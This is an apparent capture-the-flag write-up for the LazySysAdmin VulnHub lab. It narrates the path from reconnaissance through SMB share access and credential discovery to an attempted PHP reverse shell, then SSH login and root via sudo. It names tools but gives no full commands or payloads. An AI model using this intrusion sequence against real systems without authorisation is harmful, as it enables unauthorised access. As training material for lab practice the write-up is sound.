We covered the solution of LazySysAdmin VulnHub machine where we covered WordPress Penetration Testing & exploiting SMB shares.
Initial Reconnaissance
I started by performing an nmap
scan to identify the server’s IP address, which was 192.168.1.147, along with any open ports and services. A more detailed nmap
scan then helped me identify specific service versions, including SSH and Samba (on ports 139 and 445). After that, I used nikto
to scan for web vulnerabilities, which revealed a WordPress installation and phpMyAdmin.
WordPress Enumeration
Next, I used wpscan
to enumerate WordPress vulnerabilities, and during this process, I managed to identify the username “admin.” I attempted to brute-force the admin login, but unfortunately, that didn’t work out.
Samba Exploitation
Since Samba was running, I decided to use smbclient
to connect to the server. I discovered shares like “brains” and “IPC.” After some trial and error, I successfully accessed the server and listed its directory contents, where I found WordPress files and a particularly interesting file named “to_do_list.txt.” I downloaded two files from there: wp-config.php
and to_do_list.txt
.
Credential Discovery & Initial Access Attempts
The wp-config.php
file was a goldmine as it contained database credentials (username and password). I tried using these credentials to access the database, but it didn’t lead to any further progress. I then used the same credentials to attempt a login into the WordPress dashboard. I also generated a PHP reverse shell payload using msfvenom
and placed it in a WordPress theme template, but this attempt to get a shell failed.
Finding the Key
The to_do_list.txt
file proved to be crucial. It contained a note and a password: “12345.” The note explicitly stated that the admin had forgotten to remove this file and password.
Gaining SSH Access & Privilege Escalation
Armed with the “12345” password, I used it with the username “togie” (which I had identified as a user in the WordPress dashboard) to successfully SSH into the server. Finally, I used the command sudo -i
to escalate my privileges to root, which completed the challenge.
Here’s a summary of the technical commands I mentioned:
nmap
nikto
wpscan
smbclient
ls
(implied when listing directory contents)msfvenom
ssh
sudo -i